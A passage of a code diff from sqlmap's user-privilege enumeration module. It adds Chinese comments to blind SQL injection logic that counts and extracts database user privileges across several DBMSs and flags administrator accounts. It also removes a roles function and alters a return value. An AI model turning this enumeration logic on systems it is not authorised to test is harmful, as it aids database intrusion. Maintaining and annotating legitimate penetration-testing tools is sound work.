query = rootQuery.blind.count % (conditionChar, user) query = rootQuery.blind.count % (conditionChar, user) # MySQL 5.0以上版本的查询语句
elif Backend.isDbms(DBMS.ORACLE) and query2: elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.count2 % user query = rootQuery.blind.count2 % user # Oracle的第二种查询方式
else: else:
query = rootQuery.blind.count % user query = rootQuery.blind.count % user # 通用查询语句
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取权限数量
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2:
@ -556,21 +619,22 @@ class Users(object):
privileges = set() privileges = set()
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
# 循环盲注查询权限
for index in indexRange: for index in indexRange:
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % (user, index) query = rootQuery.blind.query2 % (user, index) # MySQL 5.0以下版本的查询语句
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.query % (conditionChar, user, index) query = rootQuery.blind.query % (conditionChar, user, index) # MySQL 5.0以上版本的查询语句
elif Backend.isDbms(DBMS.ORACLE) and query2: elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.query2 % (user, index) query = rootQuery.blind.query2 % (user, index) # Oracle的第二种查询方式
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, user) query = rootQuery.blind.query % (index, user) # Firebird数据库的查询语句
elif Backend.isDbms(DBMS.INFORMIX): elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,) query = rootQuery.blind.query % (user,) # Informix数据库的查询语句
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index) # 通用查询语句
privilege = unArrayizeValue(inject.getValue(query, union=False, error=False)) privilege = unArrayizeValue(inject.getValue(query, union=False, error=False))
@ -586,14 +650,14 @@ class Users(object):
for priv in privs: for priv in privs:
if priv.isdigit() and int(priv) == 1 and i in PGSQL_PRIVS: if priv.isdigit() and int(priv) == 1 and i in PGSQL_PRIVS:
privileges.add(PGSQL_PRIVS[i]) privileges.add(PGSQL_PRIVS[i]) # PostgreSQL的权限处理
i += 1 i += 1
# In MySQL >= 5.0 and Oracle we get the list # In MySQL >= 5.0 and Oracle we get the list
# of privileges as string # of privileges as string
elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID): elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID):
privileges.add(privilege) privileges.add(privilege) # MySQL 5.0以上版本和Oracle的权限处理
# In MySQL < 5.0 we get Y if the privilege is # In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise # True, N otherwise
@ -606,19 +670,19 @@ class Users(object):
if priv.upper() == 'Y': if priv.upper() == 'Y':
for position, mysqlPriv in MYSQL_PRIVS.items(): for position, mysqlPriv in MYSQL_PRIVS.items():
if position == i: if position == i:
privileges.add(mysqlPriv) privileges.add(mysqlPriv) # MySQL 5.0以下版本的权限处理
i += 1 i += 1
# In Firebird we get one letter for each privilege # In Firebird we get one letter for each privilege
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
if privilege.strip() in FIREBIRD_PRIVS: if privilege.strip() in FIREBIRD_PRIVS:
privileges.add(FIREBIRD_PRIVS[privilege.strip()]) privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # Firebird的权限处理
# In Informix we get one letter for the highest privilege # In Informix we get one letter for the highest privilege
elif Backend.isDbms(DBMS.INFORMIX): elif Backend.isDbms(DBMS.INFORMIX):
if privilege.strip() in INFORMIX_PRIVS: if privilege.strip() in INFORMIX_PRIVS:
privileges.add(INFORMIX_PRIVS[privilege.strip()]) privileges.add(INFORMIX_PRIVS[privilege.strip()]) # Informix的权限处理
# In DB2 we get Y or G if the privilege is # In DB2 we get Y or G if the privilege is
# True, N otherwise # True, N otherwise
@ -633,7 +697,7 @@ class Users(object):
if priv.upper() in ('Y', 'G'): if priv.upper() in ('Y', 'G'):
for position, db2Priv in DB2_PRIVS.items(): for position, db2Priv in DB2_PRIVS.items():
if position == i: if position == i:
privilege += ", " + db2Priv privilege += ", " + db2Priv # DB2的权限处理
i += 1 i += 1
@ -661,13 +725,6 @@ class Users(object):
for user, privileges in kb.data.cachedUsersPrivileges.items(): for user, privileges in kb.data.cachedUsersPrivileges.items():
if isAdminFromPrivileges(privileges): if isAdminFromPrivileges(privileges):
areAdmins.add(user) areAdmins.add(user) # 判断是否为DBA
return (kb.data.cachedUsersPrivileges, areAdmins)
def getRoles(self, query2=False):
warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms()
warnMsg += "exist. sqlmap will enumerate privileges instead"
logger.warning(warnMsg)
return self.getPrivileges(query2) return (kb.data.cachedUsersPrivileges)
Write Preview
Loading…
Cancel
Save